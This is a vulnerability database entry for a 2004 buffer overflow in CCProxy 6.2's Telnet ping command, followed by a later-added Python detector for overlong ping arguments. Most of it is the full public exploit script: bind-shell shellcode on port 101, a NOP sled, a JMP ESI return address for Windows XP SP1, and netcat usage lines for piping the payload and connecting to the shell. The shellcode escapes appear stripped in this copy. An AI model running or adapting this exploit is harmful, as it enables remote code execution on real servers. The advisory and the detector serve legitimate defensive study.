@Youngzsoft Youngzsoft CCProxy Buffer Overflow Vulnerability


Vulnerability ID: 1108271
Vulnerability type: Buffer overflow
Published: 2004-11-10
Updated: 2004-12-31
CVE: CVE-2004-2685
CNNVD-ID: CNNVD-200412-1009
Platform: Windows
CVSS score: 7.5
|Sources
https://www.exploit-db.com/exploits/621
https://www.securityfocus.com/bid/82517
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-1009
|Vulnerability details
YoungZSoft CCProxy 6.2 and earlier versions contain a buffer overflow vulnerability. A remote attacker can execute arbitrary code via an overlong address passed to the ping (p) command of the Telnet proxy service; this vector is different from CVE-2004-2416.
|Exploit (EXP)
######################################################################
##  |------------------------------------------------------------|  ##
##  |    CCProxy 6.2 ping Remote Buffer Overflow Exploit         |  ##  
##  |      Based on Ruder's discovery,exploit by KaGra           |  ##  
##  |   Binds Shellcode aT 101,use netcat to connect back...     |  ##
##  |            Tested in WinXP SP1 EnGlish                     |  ##
##  |       Greedingz to:NinA,Coderz.gr and my musik BanD        |  ##
##  |------------------------------------------------------------|  ##
######################################################################

# Usage:exploit.py|nc Host port,where port is the telnet service of the target
# The buG exists when a long parameter is passed to ping command in telnet
# service of CCproxy server.This is a classic stack based overflow.Ret address
# is close to ESI,so a JMP ESI will do the trick.Other nops are just for padding...
#
#
#C:exploit.py|nc localhost 23
#
#C:nc -v localhost 101
#
#Microsoft Windows XP [Version 5.1.2600]
#(C) Copyright 1985-2001 Microsoft Corp.
#
#C:Documents and Settingsxcv>





import struct

#BinD ShellCode aT PorT 101,taken from  muts exploit,thankz pul...

sc2 = "xEB"
sc2 += "x0Fx58x80x30x88x40x81x38x68x61x63x6Bx75xF4xEBx05xE8xECxFFxFF"
sc2 += "xFFx60xDEx88x88x88xDBxDDxDExDFx03xE4xACx90x03xCDxB4x03xDCx8D"
sc2 += "xF0x89x62x03xC2x90x03xD2xA8x89x63x6BxBAxC1x03xBCx03x89x66xB9"
sc2 += "x77x74xB9x48x24xB0x68xFCx8Fx49x47x85x89x4Fx63x7AxB3xF4xACx9C"
sc2 += "xFDx69x03xD2xACx89x63xEEx03x84xC3x03xD2x94x89x63x03x8Cx03x89"
sc2 += "x60x63x8AxB9x48xD7xD6xD5xD3x4Ax80x88xD6xE2xB8xD1xECx03x91x03"
sc2 += "xD3x84x03xD3x94x03x93x03xD3x80xDBxE0x06xC6x86x64x77x5Ex01x4F"
sc2 += "x09x64x88x89x88x88xDFxDExDBx01x6Dx60xAFx88x88x88x18x89x88x88"
sc2 += "x3Ex91x90x6Fx2Cx91xF8x61x6DxC1x0ExC1x2Cx92xF8x4Fx2Cx25xA6x61"
sc2 += "x51x81x7Dx25x43x65x74xB3xDFxDBxBAxD7xBBxBAx88xD3x05xC3xA8xD9"
sc2 += "x77x5Fx01x57x01x4Bx05xFDx9CxE2x8FxD1xD9xDBx77xBCx07x77xDDx8C"
sc2 += "xD1x01x8Cx06x6Ax7AxA3xAFxDCx77xBFx77xDDxB8xB9x48xD8xD8xD8xD8"
sc2 += "xC8xD8xC8xD8x77xDDxA4x01x4FxB9x53xDBxDBxE0x8Ax88x88xEDx01x68"
sc2 += "xE2x98xD8xDFx77xDDxACxDBxDFx77xDDxA0xDBxDCxDFx77xDDxA8x01x4F"
sc2 += "xE0xCBxC5xCCx88x01x6Bx0Fx72xB9x48x05xF4xACx24xE2x9DxD1x7Bx23"
sc2 += "x0Fx72x09x64xDCx88x88x88x4ExCCxACx98xCCxEEx4FxCCxACxB4x89x89"
sc2 += "x01xF4xACxC0x01xF4xACxC4x01xF4xACxD8x05xCCxACx98xDCxD8xD9xD9"
sc2 += "xD9xC9xD9xC1xD9xD9xDBxD9x77xFDx88xE0xFAx76x3Bx9Ex77xDDx8Cx77"
sc2 += "x58x01x6Ex77xFDx88xE0x25x51x8Dx46x77xDDx8Cx01x4BxE0x77x77x77"
sc2 += "x77x77xBEx77x5Bx77xFDx88xE0xF6x50x6AxFBx77xDDx8CxB9x53xDBx77"
sc2 += "x58x68x61x63x6Bx90"


buffer = 'x90'*605         # The usual nops... 

RETADDR="xc7x41xe6x77"  # JMP ESI In XP SP1 EnGliSH...

buff2='x90'*8              # padding...

print "ping "+buffer+sc2+RETADDR+buff2 # DeaD...

// milw0rm.com [2004-11-10]
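As an added defender-side example (not part of the original advisory or of the exploit above): a small check that inspects command lines arriving on the Telnet proxy port and flags a ping/p command whose address argument is far longer than any valid hostname, contains bytes that cannot occur in a host address, or carries a run of 0x90 NOP bytes like the padding the exploit uses. The length threshold, the character class and the sample lines are assumptions constructed for the example.

```python
import re

# Assumed threshold: RFC 1035 caps a hostname at 253 characters, so a legitimate
# ping/p address argument never gets near it; the exploit sends 600+ bytes.
MAX_PING_ARG = 253
NOP_SLED_MIN = 16  # a run of this many 0x90 bytes is treated as a NOP sled

# Characters that can appear in a hostname, IPv4 or bracketed IPv6 literal (assumption)
HOST_RE = re.compile(rb'^[A-Za-z0-9.\-:\[\]]+$')


def inspect_telnet_command(line: bytes) -> dict:
    """Classify one raw command line received on the Telnet proxy port.

    Returns {'command', 'arg_len', 'reasons'}; 'reasons' is empty for benign lines.
    """
    line = line.rstrip(b'\r\n')
    parts = line.split(b' ', 1)
    cmd = parts[0].lower()
    arg = parts[1] if len(parts) > 1 else b''
    reasons = []
    if cmd in (b'ping', b'p'):
        if len(arg) > MAX_PING_ARG:
            reasons.append(f'ping argument length {len(arg)} exceeds {MAX_PING_ARG}')
        if arg and not HOST_RE.match(arg):
            reasons.append('ping argument contains bytes not valid in a host address')
        if b'\x90' * NOP_SLED_MIN in arg:
            reasons.append('NOP sled (run of 0x90) in ping argument')
    return {'command': cmd.decode('latin-1'), 'arg_len': len(arg), 'reasons': reasons}


def scan(lines):
    """Return (index, reasons) for every line that looks like an overflow attempt."""
    hits = []
    for i, raw in enumerate(lines):
        result = inspect_telnet_command(raw)
        if result['reasons']:
            hits.append((i, result['reasons']))
    return hits


# Constructed sample traffic (not captured from a real session). The third line
# mimics the exploit's shape: a long NOP sled followed by arbitrary binary bytes.
SAMPLE = [
    b'ping 10.0.0.5\r\n',
    b'p example.internal\r\n',
    b'ping ' + b'\x90' * 605 + b'\xcc' * 20 + b'\r\n',
    b'help\r\n',
]

if __name__ == '__main__':
    for idx, why in scan(SAMPLE):
        print(f'line {idx}: ' + '; '.join(why))
```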
|Affected products
Youngzsoft CCProxy 6.2
|References

Source: www.youngzsoft.net
Link: http://www.youngzsoft.net/ccproxy/whatsnew.htm
Source: MILW0RM
Name: 621
Link: http://www.milw0rm.com/exploits/621
Source: MILW0RM
Name: 4360
Link: http://www.milw0rm.com/exploits/4360
Source: SECUNIA
Name: 13085
Link: http://secunia.com/advisories/13085
